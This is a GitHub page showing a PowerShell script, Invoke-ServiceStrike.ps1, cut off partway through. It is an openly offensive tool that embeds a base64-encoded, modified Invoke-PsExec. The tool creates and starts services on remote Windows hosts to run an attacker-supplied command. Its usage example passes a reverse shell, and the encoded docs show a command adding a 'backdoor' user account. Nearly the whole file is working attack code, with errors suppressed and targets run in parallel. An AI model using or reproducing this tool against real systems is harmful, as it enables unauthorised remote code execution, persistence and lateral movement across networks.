-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathInvoke-ServiceStrike.ps1
More file actions
168 lines (118 loc) · 20.3 KB
/
Invoke-ServiceStrike.ps1
File metadata and controls
168 lines (118 loc) · 20.3 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
<#
Invoke-ServiceStrike.ps1
Author: @polair
License: BSD 3-Clause
#>
########################################################
#
# This script includes and executes a modified version of Invoke-PsExec originally published under the BSD 3-Clause License.
# Author: Will Schroeder (@harmj0y)
# https://gist.github.com/HarmJ0y/c84065c0c487d4c74cc1
#
########################################################
function Invoke-ServiceStrike {
<#
.SYNOPSIS
Attempts to create and start a service by bypassing the OpenService call, in order to verify whether the current user has local admin privileges on domain or LAN machines, assuming only SC_MANAGER_ALL_ACCESS right is available on the SCManager.
.DESCRIPTION
Attempts to create and start a service by bypassing the OpenService call, in order to verify whether the current user has local admin privileges on domain or LAN machines, assuming only SC_MANAGER_ALL_ACCESS right is available on the SCManager.
.PARAMETER ComputerName
IP address or hostname of the remote system.
.PARAMETER timeout
Maximum time to wait for runspaces (max = timeout * number of machines).
.PARAMETER threads
Maximum number of runspaces to run in parallel.
.EXAMPLE
Import-Module .\Invoke-ServiceStrike.ps1
Invoke-ServiceStrike -Command <revShell> [-timeout 45000 -threads 5 -ComputerName '192.168.1.103' -ServiceName test]
#>
[CmdletBinding()]
Param (
[Parameter(Mandatory = $false, ValueFromPipeLine = $true, ValueFromPipelineByPropertyName = $true)]
[String]
$ComputerName,
[Parameter(Mandatory = $True)]
[String]
$Command,
[String]
$ServiceName = "TestSVC",
[Parameter(Mandatory = $false)]
[string]
$timeout = 35000,
[Parameter(Mandatory = $false)]
[int]
$threads = 5
)
Begin {
$ErrorActionPreference2 = "$ErrorActionPreference"
$ErrorActionPreference = "silentlycontinue"
$invoke_psexec = @'
ZnVuY3Rpb24gSW52b2tlLVBzRXhlYyB7CiAgICA8IwogICAgLlNZTk9QU0lTCgogICAgICAgIFRoaXMgZnVuY3Rpb24gaXMgYSByb3VnaCBwb3J0IG9mIE1ldGFzcGxvaXQncyBwc2V4ZWMgZnVuY3Rpb25hbGl0eS4KICAgICAgICBJdCB1dGlsaXplcyBXaW5kb3dzIEFQSSBjYWxscyB0byBvcGVuIHVwIHRoZSBzZXJ2aWNlIG1hbmFnZXIgb24KICAgICAgICBhIHJlbW90ZSBtYWNoaW5lLCBjcmVhdGVzL3J1biBhIHNlcnZpY2Ugd2l0aCBhbiBhc3NvY2lhdGVkIGJpbmFyeQogICAgICAgIHBhdGggb3IgY29tbWFuZCwgYW5kIHRoZW4gY2xlYW5zIGV2ZXJ5dGhpbmcgdXAuCgogICAgICAgIEFkYXB0ZWQgZnJvbSBNU0YncyB2ZXJzaW9uIChzZWUgbGlua3MpLgoKICAgICAgICBBdXRob3I6IEBoYXJtajB5CiAgICAgICAgTGljZW5zZTogQlNEIDMtQ2xhdXNlCgogICAgLlBBUkFNRVRFUiBDb21wdXRlck5hbWUKCiAgICAgICAgQ29tcHV0ZXJOYW1lIHRvIHJ1biB0aGUgY29tbWFuZCBvbi4KCiAgICAuUEFSQU1FVEVSIENvbW1hbmQKCiAgICAgICAgQmluYXJ5IHBhdGggKG9yIFdpbmRvd3MgY29tbWFuZCkgdG8gZXhlY3V0ZS4KCiAgICAuUEFSQU1FVEVSIFNlcnZpY2VOYW1lCgogICAgICAgIFRoZSBuYW1lIG9mIHRoZSBzZXJ2aWNlIHRvIGNyZWF0ZSwgZGVmYXVsdHMgdG8gIlRlc3RTVkMiCgoKICAgIC5QQVJBTUVURVIgTm9DbGVhbnVwCgogICAgICAgIERvbid0IHJlbW92ZSB0aGUgc2VydmljZSBhZnRlciBzdGFydGluZyBpdAoKICAgIC5FWEFNUExFCgogICAgICAgIFBTIEM6XD4gSW52b2tlLVBzRXhlYyAtQ29tcHV0ZXJOYW1lIDE5Mi4xNjguNTAuMjAwIC1Db21tYW5kICJuZXQgdXNlciBiYWNrZG9vciBwYXNzd29yZDEyMyAvYWRkIiAtU2VydmljZU5hbWUgVXBkYXRlcjMyCgogICAgICAgIENyZWF0ZXMgYSB1c2VyIG5hbWVkIGJhY2tkb29yIG9uIHRoZSAxOTIuMTY4LjUwLjIwMCBob3N0LCB3aXRoIHRoZQogICAgICAgIHRlbXBvcmFyeSBzZXJ2aWNlIGJlaW5nIG5hbWVkICdVcGRhdGVyMzInLgoKICAgIC5FWEFNUExFCgogICAgICAgIFBTIEM6XD4gCgogICAgICAgIFJ1bnMgdGhlICJkaXIgQzpcIiBjb21tYW5kIG9uIDE5Mi4xNjguNTAuMjAwIHdpdGggYSB0ZW1wb3Jhcnkgc2VydmljZSBuYW1lZCAnVXBkYXRlcjMyJywKICAgICAgICBhbmQgY29waWVzIHRoZSByZXN1bHQgZmlsZSB0byAicmVzdWx0cy50eHQiIG9uIHRoZSBsb2NhbCBwYXRoLgoKICAgIC5FWEFNUExFCgogICAgICAgIFBTIEM6XD4gLgoKICAgICAgICBVcGxvYWRzICJzZXJ2aWNlLmV4ZSIgdG8gdGhlIHJlbW90ZSBob3N0LCByZWdpc3RlcnMvc3RhcnRzIGl0IGFzIGEgc2VydmljZSB3aXRoIG5hbWUKICAgICAgICAnVXBkYXRlcjMyJywgYW5kIHJlbW92ZXMgdGhlIHNlcnZpY2UvYmluYXJ5IGFmdGVyIGl0IHJ1bnMgKG9yIGZhaWxzIHRvIHJlc3BvbmQgdy9pbiAzMCBzZWNvbmRzKS4KCiAgICAuTElOSwoKICAgICAgICBodHRwczovL2dpdGh1Yi5jb20vcmFwaWQ3L21ldGFzcGxvaXQtZnJhbWV3b3JrL2Jsb2IvbWFzdGVyL21vZHVsZXMvZXhwbG9pdHMvd2luZG93cy9zbWIvcHNleGVjLnJiCiAgICAgICAgaHR0cHM6Ly9naXRodWIuY29tL3JhcGlkNy9tZXRhc3Bsb2l0LWZyYW1ld29yay9ibG9iL21hc3Rlci90b29scy9wc2V4ZWMucmIKIz4KICAgIFtDbWRsZXRCaW5kaW5nKCldCiAgICBwYXJhbSgKICAgICAgICBbUGFyYW1ldGVyKE1hbmRhdG9yeSA9ICRUcnVlKV0KICAgICAgICBbU3RyaW5nXQogICAgICAgICRDb21wdXRlck5hbWUsCgogICAgICAgIFtTdHJpbmddCiAgICAgICAgJENvbW1hbmQsCgogICAgICAgIFtTdHJpbmddCiAgICAgICAgJFNlcnZpY2VOYW1lID0gIlRlc3RTVkMiLAoKICAgICAgICBbc3dpdGNoXQogICAgICAgICROb0NsZWFudXAKICAgICkKCiAgICAkRXJyb3JBY3Rpb25QcmVmZXJlbmNlID0gIlN0b3AiCgogICAgIyAgaHR0cDovL3N0YWNraW5nY29kZS5jb20vYmxvZy8yMDExLzEwLzI3L3F1aWNrLXJhbmRvbS1zdHJpbmcKICAgIGZ1bmN0aW9uIExvY2FsOkdldC1SYW5kb21TdHJpbmcgewogICAgICAgIHBhcmFtICgKICAgICAgICAgICAgW2ludF0kTGVuZ3RoID0gMTIKICAgICAgICApCiAgICAgICAgJHNldCA9ICJhYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ekFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaIi5Ub0NoYXJBcnJheSgpCiAgICAgICAgJHJlc3VsdCA9ICIiCiAgICAgICAgZm9yICgkeCA9IDA7ICR4IC1sdCAkTGVuZ3RoOyAkeCsrKSB7CiAgICAgICAgICAgICRyZXN1bHQgKz0gJHNldCB8IEdldC1SYW5kb20KICAgICAgICB9CiAgICAgICAgJHJlc3VsdAogICAgfQoKICAgICMgZnJvbSBodHRwOi8vd3d3LmV4cGxvaXQtbW9uZGF5LmNvbS8yMDEyLzA1L2FjY2Vzc2luZy1uYXRpdmUtd2luZG93cy1hcGktaW4uaHRtbAogICAgZnVuY3Rpb24gTG9jYWw6R2V0LURlbGVnYXRlVHlwZSB7CiAgICAgICAgUGFyYW0KICAgICAgICAoCiAgICAgICAgICAgIFtPdXRwdXRUeXBlKFtUeXBlXSldCgogICAgICAgICAgICBbUGFyYW1ldGVyKCBQb3NpdGlvbiA9IDApXQogICAgICAgICAgICBbVHlwZVtdXQogICAgICAgICAgICAkUGFyYW1ldGVycyA9IChOZXctT2JqZWN0IFR5cGVbXSgwKSksCgogICAgICAgICAgICBbUGFyYW1ldGVyKCBQb3NpdGlvbiA9IDEgKV0KICAgICAgICAgICAgW1R5cGVdCiAgICAgICAgICAgICRSZXR1cm5UeXBlID0gW1ZvaWRdCiAgICAgICAgKQoKICAgICAgICAkRG9tYWluID0gW0FwcERvbWFpbl06OkN1cnJlbnREb21haW4KICAgICAgICAkRHluQXNzZW1ibHkgPSBOZXctT2JqZWN0IFN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5TmFtZSgnUmVmbGVjdGVkRGVsZWdhdGUnKQogICAgICAgICRBc3NlbWJseUJ1aWxkZXIgPSAkRG9tYWluLkRlZmluZUR5bmFtaWNBc3NlbWJseSgkRHluQXNzZW1ibHksIFtTeXN0ZW0uUmVmbGVjdGlvbi5FbWl0LkFzc2VtYmx5QnVpbGRlckFjY2Vzc106OlJ1bikKICAgICAgICAkTW9kdWxlQnVpbGRlciA9ICRBc3NlbWJseUJ1aWxkZXIuRGVmaW5lRHluYW1pY01vZHVsZSgnSW5NZW1vcnlNb2R1bGUnLCAkZmFsc2UpCiAgICAgICAgJFR5cGVCdWlsZGVyID0gJE1vZHVsZUJ1aWxkZXIuRGVmaW5lVHlwZSgnTXlEZWxlZ2F0ZVR5cGUnLCAnQ2xhc3MsIFB1YmxpYywgU2VhbGVkLCBBbnNpQ2xhc3MsIEF1dG9DbGFzcycsIFtTeXN0ZW0uTXVsdGljYXN0RGVsZWdhdGVdKQogICAgICAgICRDb25zdHJ1Y3RvckJ1aWxkZXIgPSAkVHlwZUJ1aWxkZXIuRGVmaW5lQ29uc3RydWN0b3IoJ1JUU3BlY2lhbE5hbWUsIEhpZGVCeVNpZywgUHVibGljJywgW1N5c3RlbS5SZWZsZWN0aW9uLkNhbGxpbmdDb252ZW50aW9uc106OlN0YW5kYXJkLCAkUGFyYW1ldGVycykKICAgICAgICAkQ29uc3RydWN0b3JCdWlsZGVyLlNldEltcGxlbWVudGF0aW9uRmxhZ3MoJ1J1bnRpbWUsIE1hbmFnZWQnKQogICAgICAgICRNZXRob2RCdWlsZGVyID0gJFR5cGVCdWlsZGVyLkRlZmluZU1ldGhvZCgnSW52b2tlJywgJ1B1YmxpYywgSGlkZUJ5U2lnLCBOZXdTbG90LCBWaXJ0dWFsJywgJFJldHVyblR5cGUsICRQYXJhbWV0ZXJzKQogICAgICAgICRNZXRob2RCdWlsZGVyLlNldEltcGxlbWVudGF0aW9uRmxhZ3MoJ1J1bnRpbWUsIE1hbmFnZWQnKQoKICAgICAgICBXcml0ZS1PdXRwdXQgJFR5cGVCdWlsZGVyLkNyZWF0ZVR5cGUoKQogICAgfQoKICAgICMgZnJvbSBodHRwOi8vd3d3LmV4cGxvaXQtbW9uZGF5LmNvbS8yMDEyLzA1L2FjY2Vzc2luZy1uYXRpdmUtd2luZG93cy1hcGktaW4uaHRtbAogICAgZnVuY3Rpb24gTG9jYWw6R2V0LVByb2NBZGRyZXNzIHsKICAgICAgICBQYXJhbQogICAgICAgICgKICAgICAgICAgICAgW091dHB1dFR5cGUoW0ludFB0cl0pXQoKICAgICAgICAgICAgW1BhcmFtZXRlciggUG9zaXRpb24gPSAwLCBNYW5kYXRvcnkgPSAkVHJ1ZSApXQogICAgICAgICAgICBbU3RyaW5nXQogICAgICAgICAgICAkTW9kdWxlLAoKICAgICAgICAgICAgW1BhcmFtZXRlciggUG9zaXRpb24gPSAxLCBNYW5kYXRvcnkgPSAkVHJ1ZSApXQogICAgICAgICAgICBbU3RyaW5nXQogICAgICAgICAgICAkUHJvY2VkdXJlCiAgICAgICAgKQoKICAgICAgICAjIEdldCBhIHJlZmVyZW5jZSB0byBTeXN0ZW0uZGxsIGluIHRoZSBHQUMKICAgICAgICAkU3lzdGVtQXNzZW1ibHkgPSBbQXBwRG9tYWluXTo6Q3VycmVudERvbWFpbi5HZXRBc3NlbWJsaWVzKCkgfAogICAgICAgIFdoZXJlLU9iamVjdCB7ICRfLkdsb2JhbEFzc2VtYmx5Q2FjaGUgLUFuZCAkXy5Mb2NhdGlvbi5TcGxpdCgnXFwnKVstMV0uRXF1YWxzKCdTeXN0ZW0uZGxsJykgfQogICAgICAgICRVbnNhZmVOYXRpdmVNZXRob2RzID0gJFN5c3RlbUFzc2VtYmx5LkdldFR5cGUoJ01pY3Jvc29mdC5XaW4zMi5VbnNhZmVOYXRpdmVNZXRob2RzJykKICAgICAgICAjIEdldCBhIHJlZmVyZW5jZSB0byB0aGUgR2V0TW9kdWxlSGFuZGxlIGFuZCBHZXRQcm9jQWRkcmVzcyBtZXRob2RzCiAgICAgICAgJEdldE1vZHVsZUhhbmRsZSA9ICRVbnNhZmVOYXRpdmVNZXRob2RzLkdldE1ldGhvZCgnR2V0TW9kdWxlSGFuZGxlJykKICAgICAgICAkR2V0UHJvY0FkZHJlc3MgPSAkVW5zYWZlTmF0aXZlTWV0aG9kcy5HZXRNZXRob2QoJ0dldFByb2NBZGRyZXNzJywgW1R5cGVbXV1AKFtTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuSGFuZGxlUmVmXSwgW1N0cmluZ10pKQogICAgICAgICMgR2V0IGEgaGFuZGxlIHRvIHRoZSBtb2R1bGUgc3BlY2lmaWVkCiAgICAgICAgJEtlcm4zMkhhbmRsZSA9ICRHZXRNb2R1bGVIYW5kbGUuSW52b2tlKCRudWxsLCBAKCRNb2R1bGUpKQogICAgICAgICR0bXBQdHIgPSBOZXctT2JqZWN0IEludFB0cgogICAgICAgICRIYW5kbGVSZWYgPSBOZXctT2JqZWN0IFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5IYW5kbGVSZWYoJHRtcFB0ciwgJEtlcm4zMkhhbmRsZSkKCiAgICAgICAgIyBSZXR1cm4gdGhlIGFkZHJlc3Mgb2YgdGhlIGZ1bmN0aW9uCiAgICAgICAgV3JpdGUtT3V0cHV0ICRHZXRQcm9jQWRkcmVzcy5JbnZva2UoJG51bGwsIEAoW1N5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5IYW5kbGVSZWZdJEhhbmRsZVJlZiwgJFByb2NlZHVyZSkpCiAgICB9CgoKICAgIGZ1bmN0aW9uIExvY2FsOkludm9rZS1Qc0V4ZWNDbWQgewogICAgICAgIHBhcmFtKAogICAgICAgICAgICBbUGFyYW1ldGVyKE1hbmRhdG9yeSA9ICRUcnVlKV0KICAgICAgICAgICAgW1N0cmluZ10KICAgICAgICAgICAgJENvbXB1dGVyTmFtZSwKCiAgICAgICAgICAgIFtQYXJhbWV0ZXIoTWFuZGF0b3J5ID0gJFRydWUpXQogICAgICAgICAgICBbU3RyaW5nXQogICAgICAgICAgICAkQ29tbWFuZCwKCiAgICAgICAgICAgIFtTdHJpbmddCiAgICAgICAgICAgICRTZXJ2aWNlTmFtZSA9ICJUZXN0U1ZDIiwKCiAgICAgICAgICAgIFtzd2l0Y2hdCiAgICAgICAgICAgICROb0NsZWFudXAKICAgICAgICApCgogICAgICAgICMgRGVjbGFyZS9zZXR1cCBhbGwgdGhlIG5lZWRlZCBBUEkgZnVuY3Rpb24KICAgICAgICAjIGFkYXB0ZWQgaGVhdmlseSBmcm9tIGh0dHA6Ly93d3cuZXhwbG9pdC1tb25kYXkuY29tLzIwMTIvMDUvYWNjZXNzaW5nLW5hdGl2ZS13aW5kb3dzLWFwaS1pbi5odG1sCiAgICAgICAgJENsb3NlU2VydmljZUhhbmRsZUFkZHIgPSBHZXQtUHJvY0FkZHJlc3MgQWR2YXBpMzIuZGxsIENsb3NlU2VydmljZUhhbmRsZQogICAgICAgICRDbG9zZVNlcnZpY2VIYW5kbGVEZWxlZ2F0ZSA9IEdldC1EZWxlZ2F0ZVR5cGUgQCggW0ludFB0cl0gKSAoW0ludF0pCiAgICAgICAgJENsb3NlU2VydmljZUhhbmRsZSA9IFtTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuTWFyc2hhbF06OkdldERlbGVnYXRlRm9yRnVuY3Rpb25Qb2ludGVyKCRDbG9zZVNlcnZpY2VIYW5kbGVBZGRyLCAkQ2xvc2VTZXJ2aWNlSGFuZGxlRGVsZWdhdGUpCgogICAgICAgICRPcGVuU0NNYW5hZ2VyQUFkZHIgPSBHZXQtUHJvY0FkZHJlc3MgQWR2YXBpMzIuZGxsIE9wZW5TQ01hbmFnZXJBCiAgICAgICAgJE9wZW5TQ01hbmFnZXJBRGVsZWdhdGUgPSBHZXQtRGVsZWdhdGVUeXBlIEAoIFtTdHJpbmddLCBbU3RyaW5nXSwgW0ludF0pIChbSW50UHRyXSkKICAgICAgICAkT3BlblNDTWFuYWdlckEgPSBbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpHZXREZWxlZ2F0ZUZvckZ1bmN0aW9uUG9pbnRlcigkT3BlblNDTWFuYWdlckFBZGRyLCAkT3BlblNDTWFuYWdlckFEZWxlZ2F0ZSkKCgogICAgICAgICRDcmVhdGVTZXJ2aWNlQUFkZHIgPSBHZXQtUHJvY0FkZHJlc3MgQWR2YXBpMzIuZGxsIENyZWF0ZVNlcnZpY2VBCiAgICAgICAgJENyZWF0ZVNlcnZpY2VBRGVsZWdhdGUgPSBHZXQtRGVsZWdhdGVUeXBlIEAoIFtJbnRQdHJdLCBbU3RyaW5nXSwgW1N0cmluZ10sIFtJbnRdLCBbSW50XSwgW0ludF0sIFtJbnRdLCBbU3RyaW5nXSwgW1N0cmluZ10sIFtJbnRdLCBbSW50XSwgW0ludF0sIFtJbnRdKSAoW0ludFB0cl0pCiAgICAgICAgJENyZWF0ZVNlcnZpY2VBID0gW1N5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5NYXJzaGFsXTo6R2V0RGVsZWdhdGVGb3JGdW5jdGlvblBvaW50ZXIoJENyZWF0ZVNlcnZpY2VBQWRkciwgJENyZWF0ZVNlcnZpY2VBRGVsZWdhdGUpCgogICAgICAgICRTdGFydFNlcnZpY2VBQWRkciA9IEdldC1Qcm9jQWRkcmVzcyBBZHZhcGkzMi5kbGwgU3RhcnRTZXJ2aWNlQQogICAgICAgICRTdGFydFNlcnZpY2VBRGVsZWdhdGUgPSBHZXQtRGVsZWdhdGVUeXBlIEAoIFtJbnRQdHJdLCBbSW50XSwgW0ludF0pIChbSW50UHRyXSkKICAgICAgICAkU3RhcnRTZXJ2aWNlQSA9IFtTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuTWFyc2hhbF06OkdldERlbGVnYXRlRm9yRnVuY3Rpb25Qb2ludGVyKCRTdGFydFNlcnZpY2VBQWRkciwgJFN0YXJ0U2VydmljZUFEZWxlZ2F0ZSkKCiAgICAgICAgJERlbGV0ZVNlcnZpY2VBZGRyID0gR2V0LVByb2NBZGRyZXNzIEFkdmFwaTMyLmRsbCBEZWxldGVTZXJ2aWNlCiAgICAgICAgJERlbGV0ZVNlcnZpY2VEZWxlZ2F0ZSA9IEdldC1EZWxlZ2F0ZVR5cGUgQCggW0ludFB0cl0gKSAoW0ludFB0cl0pCiAgICAgICAgJERlbGV0ZVNlcnZpY2UgPSBbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpHZXREZWxlZ2F0ZUZvckZ1bmN0aW9uUG9pbnRlcigkRGVsZXRlU2VydmljZUFkZHIsICREZWxldGVTZXJ2aWNlRGVsZWdhdGUpCgogICAgICAgICRHZXRMYXN0RXJyb3JBZGRyID0gR2V0LVByb2NBZGRyZXNzIEtlcm5lbDMyLmRsbCBHZXRMYXN0RXJyb3IKICAgICAgICAkR2V0TGFzdEVycm9yRGVsZWdhdGUgPSBHZXQtRGVsZWdhdGVUeXBlIEAoKSAoW0ludF0pCiAgICAgICAgJEdldExhc3RFcnJvciA9IFtTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuTWFyc2hhbF06OkdldERlbGVnYXRlRm9yRnVuY3Rpb25Qb2ludGVyKCRHZXRMYXN0RXJyb3JBZGRyLCAkR2V0TGFzdEVycm9yRGVsZWdhdGUpCgogICAgICAgICMgU3RlcCAxIC0gT3BlblNDTWFuYWdlcigpCiAgICAgICAgIyAweEYwMDNGID0gU0NfTUFOQUdFUl9BTExfQUNDRVNTCiAgICAgICAgIyAgIGh0dHA6Ly9tc2RuLm1pY3Jvc29mdC5jb20vZW4tdXMvbGlicmFyeS93aW5kb3dzL2Rlc2t0b3AvbXM2ODU5ODEodj12cy44NSkuYXNweAogICAgICAgICMgIlsqXSBPcGVuaW5nIHNlcnZpY2UgbWFuYWdlciIKICAgICAgICAkTWFuYWdlckhhbmRsZSA9ICRPcGVuU0NNYW5hZ2VyQS5JbnZva2UoIlxcJENvbXB1dGVyTmFtZSIsICJTZXJ2aWNlc0FjdGl2ZSIsIDB4RjAwM0YpCiAgICAgICAgIyBXcml0ZS1WZXJib3NlICJbKl0gU2VydmljZSBtYW5hZ2VyIGhhbmRsZTogJE1hbmFnZXJIYW5kbGUiCgogICAgICAgICMgaWYgd2UgZ2V0IGEgbm9uLXplcm8gaGFuZGxlIGJhY2ssIGV2ZXJ5dGhpbmcgd2FzIHN1Y2Nlc3NmdWwKICAgICAgICBpZiAoJE1hbmFnZXJIYW5kbGUgLWFuZCAoJE1hbmFnZXJIYW5kbGUgLW5lIDApKSB7CgogICAgICAgICAgICAjIFN0ZXAgMiAtIENyZWF0ZVNlcnZpY2UoKQogICAgICAgICAgICAjIDB4RjAwM0YgPSBTQ19NQU5BR0VSX0FMTF9BQ0NFU1MKICAgICAgICAgICAgIyAweDEwID0gU0VSVklDRV9XSU4zMl9PV05fUFJPQ0VTUwogICAgICAgICAgICAjIDB4MyA9IFNFUlZJQ0VfREVNQU5EX1NUQVJUCiAgICAgICAgICAgICMgMHgxID0gU0VSVklDRV9FUlJPUl9OT1JNQUwKICAgICAgICAgICAgIyAiWypdIENyZWF0aW5nIG5ldyBzZXJ2aWNlOiAnJFNlcnZpY2VOYW1lJyIKICAgICAgICAgICAgJFNlcnZpY2VIYW5kbGUgPSAkQ3JlYXRlU2VydmljZUEuSW52b2tlKCRNYW5hZ2VySGFuZGxlLCAkU2VydmljZU5hbWUsICRTZXJ2aWNlTmFtZSwgMHhGMDAzRiwgMHgxMCwgMHgzLCAweDEsICRDb21tYW5kLCAkbnVsbCwgJG51bGwsICRudWxsLCAkbnVsbCwgJG51bGwpCiAgICAgICAgICAgICNXcml0ZS1WZXJib3NlICJbKl0gQ3JlYXRlU2VydmljZUEgSGFuZGxlOiAkU2VydmljZUhhbmRsZSIKICAgICAgICAgICAgICAKICAgICAgICAgICAgaWYgKCRTZXJ2aWNlSGFuZGxlIC1hbmQgKCRTZXJ2aWNlSGFuZGxlIC1uZSAwKSkgewoKICAgICAgICAgICAgICAgICMgU3RlcCA1IC0gU3RhcnRTZXJ2aWNlKCkKICAgICAgICAgICAgICAgICMgIlsqXSBTdGFydGluZyB0aGUgc2VydmljZSwgZW5zdXJlIHRoZSBjb21tYW5kIHJ1bnMgYXMgZXhwZWN0ZWQuIgogICAgICAgICAgICAgICAgJHZhbCA9ICRTdGFydFNlcnZpY2VBLkludm9rZSgkU2VydmljZUhhbmRsZSwgJG51bGwsICRudWxsKQoKICAgICAgICAgICAgICAgICMgaWYgd2Ugc3VjY2Vzc2Z1bGx5IHN0YXJ0ZWQgdGhlIHNlcnZpY2UsIGxldCBpdCBicmVhdGhlIGFuZCB0aGVuIGRlbGV0ZSBpdAogICAgICAgICAgICAgICAgaWYgKCR2YWwgLW5lIDApIHsKICAgICAgICAgICAgICAgICAgICAiYG5bK10gJENvbXB1dGVyTmFtZSA6IFNlcnZpY2Ugc3VjY2Vzc2Z1bGx5IHN0YXJ0ZWQgIgogICAgICAgICAgICAgICAgICAgICMgYnJlYXRoZSBmb3IgYSBzZWNvbmQKICAgICAgICAgICAgICAgICAgICBTdGFydC1TbGVlcCAtcyAxCiAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICBlbHNlIHsKICAgICAgICAgICAgICAgICAgICAjIGVycm9yIGNvZGVzIC0gaHR0cDovL21zZG4ubWljcm9zb2Z0LmNvbS9lbi11cy9saWJyYXJ5L3dpbmRvd3MvZGVza3RvcC9tczY4MTM4MSh2PXZzLjg1KS5hc3B4CiAgICAgICAgICAgICAgICAgICAgJGVyciA9ICRHZXRMYXN0RXJyb3IuSW52b2tlKCkKICAgICAgICAgICAgICAgICAgICBpZiAoJGVyciAtZXEgMTA1MykgewogICAgICAgICAgICAgICAgICAgICAgICAiYG5bK10gJENvbXB1dGVyTmFtZSA6IFRoZSBzZXJ2aWNlIHN0YXJ0ZWQgYnV0IHJldHVybmVkIGVycm9yIDEwNTMuIEl0J3MgYWx3YXlzIHdvcnRoIGNoZWNraW5nIHRoYXQgdGhlIGNvbW1hbmQgd2FzIGV4ZWN1dGVkIHByb3Blcmx5LiIKICAgICAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICAgICAgZWxzZSB7CiAgICAgICAgICAgICAgICAgICAgICAgICNXcml0ZS1XYXJuaW5nICJbIV0gU3RhcnRTZXJ2aWNlIGZhaWxlZCwgTGFzdEVycm9yOiAkZXJyIgogICAgICAgICAgICAgICAgICAgICAgICAjIlshXSBTdGFydFNlcnZpY2UgZmFpbGVkLCBMYXN0RXJyb3I6ICRlcnIiCiAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgICAgICMgYnJlYXRoZSBmb3IgYSBzZWNvbmQKICAgICAgICAgICAgICAgICAgICBTdGFydC1TbGVlcCAtcyAxCiAgICAgICAgICAgICAgICB9CgogICAgICAgICAgICAgICAgaWYgKC1ub3QgJE5vQ2xlYW51cCkgewogICAgICAgICAgICAgICAgICAgICMgc3RhcnQgY2xlYW51cAogICAgICAgICAgICAgICAgICAgICMgU3RlcCA2IC0gRGVsZXRlU2VydmljZSgpCiAgICAgICAgICAgICAgICAgICAgIlsrXSAkQ29tcHV0ZXJOYW1lIDogRGVsZXRpbmcgdGhlIHNlcnZpY2UgJyRTZXJ2aWNlTmFtZSciCiAgICAgICAgICAgICAgICAgICAgJHZhbCA9ICREZWxldGVTZXJ2aWNlLmludm9rZSgkU2VydmljZUhhbmRsZSkKCiAgICAgICAgICAgICAgICAgICAgaWYgKCR2YWwgLWVxIDApIHsKICAgICAgICAgICAgICAgICAgICAgICAgIyBlcnJvciBjb2RlcyAtIGh0dHA6Ly9tc2RuLm1pY3Jvc29mdC5jb20vZW4tdXMvbGlicmFyeS93aW5kb3dzL2Rlc2t0b3AvbXM2ODEzODEodj12cy44NSkuYXNweAogICAgICAgICAgICAgICAgICAgICAgICAkZXJyID0gJEdldExhc3RFcnJvci5JbnZva2UoKQogICAgICAgICAgICAgICAgICAgICAgICAiWyFdICRDb21wdXRlck5hbWUgOiBEZWxldGVTZXJ2aWNlIGZhaWxlZCwgTGFzdEVycm9yOiAkZXJyYG4iCiAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgICAgIGVsc2UgewogICAgICAgICAgICAgICAgICAgICAgICAiWytdICRDb21wdXRlck5hbWUgOiBTZXJ2aWNlIHN1Y2Nlc3NmdWxseSBkZWxldGVkYG4iCiAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgfQoKICAgICAgICAgICAgICAgICMgU3RlcCA3IC0gQ2xvc2VTZXJ2aWNlSGFuZGxlKCkgZm9yIHRoZSBzZXJ2aWNlIGhhbmRsZQogICAgICAgICAgICAgICAgIyAiWypdIENsb3NpbmcgdGhlIHNlcnZpY2UgaGFuZGxlIgogICAgICAgICAgICAgICAgJHZhbCA9ICRDbG9zZVNlcnZpY2VIYW5kbGUuSW52b2tlKCRTZXJ2aWNlSGFuZGxlKQogICAgICAgICAgICAgICAgIyBXcml0ZS1WZXJib3NlICJbKl0gU2VydmljZSBoYW5kbGUgY2xvc2VkIG9mZiIKCiAgICAgICAgICAgIH0KICAgICAgICAgICAgZWxzZSB7CiAgICAgICAgICAgICAgICAjIGVycm9yIGNvZGVzIC0gaHR0cDovL21zZG4ubWljcm9zb2Z0LmNvbS9lbi11cy9saWJyYXJ5L3dpbmRvd3MvZGVza3RvcC9tczY4MTM4MSh2PXZzLjg1KS5hc3B4CiAgICAgICAgICAgICAgICAkZXJyID0gJEdldExhc3RFcnJvci5JbnZva2UoKQogICAgICAgICAgICAgICAgIyBXcml0ZS1XYXJuaW5nICJbIV0gQ3JlYXRlU2VydmljZUEgZmFpbGVkLCBMYXN0RXJyb3I6ICRlcnIiCiAgICAgICAgICAgICAgICAiYG5bIV0gJENvbXB1dGVyTmFtZSA6IENyZWF0ZVNlcnZpY2VBIGZhaWxlZCwgTGFzdEVycm9yOiAkZXJyLiBUcnkgdXNpbmcgYSBkaWZmZXJlbnQgc2V